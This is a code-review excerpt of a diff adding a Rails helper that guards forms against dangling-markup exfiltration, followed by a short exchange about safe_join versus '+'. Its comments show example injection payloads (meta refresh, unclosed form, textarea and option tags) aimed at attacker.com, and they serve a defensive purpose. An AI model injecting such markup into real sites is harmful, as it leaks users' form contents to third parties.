actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

```diff
@@ -0,0 +1,84 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers
+    module ContentExfiltrationPreventionHelper
+      class << self
+        attr_accessor :prepend_content_exfiltration_prevention
+        self.prepend_content_exfiltration_prevention = false
+      end
+
+      # Close any open attributes before each form tag. This prevents attackers from
+      # injecting partial tags that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <meta http-equiv="refresh" content='0;URL=https://attacker.com?
+      #
+      # The HTML following this tag, up until the next single quote would be sent to
+      # https://attacker.com. By closing any open attributes, we ensure that form
+      # contents are never exfiltrated this way.
+      CLOSE_QUOTES_COMMENT = %q(<!-- '"` -->).html_safe.freeze
+
+      # Close any open tags that support CDATA (textarea, xmp) before each form tag.
+      # This prevents attackers from injecting unclosed tags that could capture
+      # form contents.
+      #
+      # For example, an attacker might inject:
+      #
+      # <form action="https://attacker.com"><textarea>
+      #
+      # The HTML following this tag, up until the next `</textarea>` or the end of
+      # the document would be captured by the attacker's <textarea>. By closing any
+      # open textarea tags, we ensure that form contents are never exfiltrated.
+      CLOSE_CDATA_COMMENT = "<!-- </textarea></xmp> -->".html_safe.freeze
+
+      # Close any open option tags before each form tag. This prevents attackers
+      # from injecting unclosed options that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      # <form action="https://attacker.com"><option>
+      #
+      # The HTML following this tag, up until the next `</option>` or the end of
+      # the document would be captured by the attacker's <option>. By closing any
+      # open option tags, we ensure that form contents are never exfiltrated.
+      CLOSE_OPTION_TAG = "</option>".html_safe.freeze
+
+      # Close any open form tags before each new form tag. This prevents attackers
+      # from injecting unclosed forms that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      # <form action="https://attacker.com">
+      #
+      # The form elements following this tag, up until the next `</form>` would be
+      # captured by the attacker's <form>. By closing any open form tags, we
+      # ensure that form contents are never exfiltrated.
+      CLOSE_FORM_TAG = "</form>".html_safe.freeze
+
+      def prevent_content_exfiltration(html)
+        if prepend_content_exfiltration_prevention
+          safe_join([
```

Comment:
Is this functionally distinct from `content_exfiltration_prevention_markup + html` (or the equivalent `PREFIX + html` assuming 👇🏻)?

Off the top of my head, given we always know the LHS is an HTML-safe string, I'm failing to think of how they would differ.

Reply:
That's a good question, and honestly I'm not sure. The code in the GitHub codebase uses `safe_join`, but I couldn't tell you why. Maybe `+` would be ok?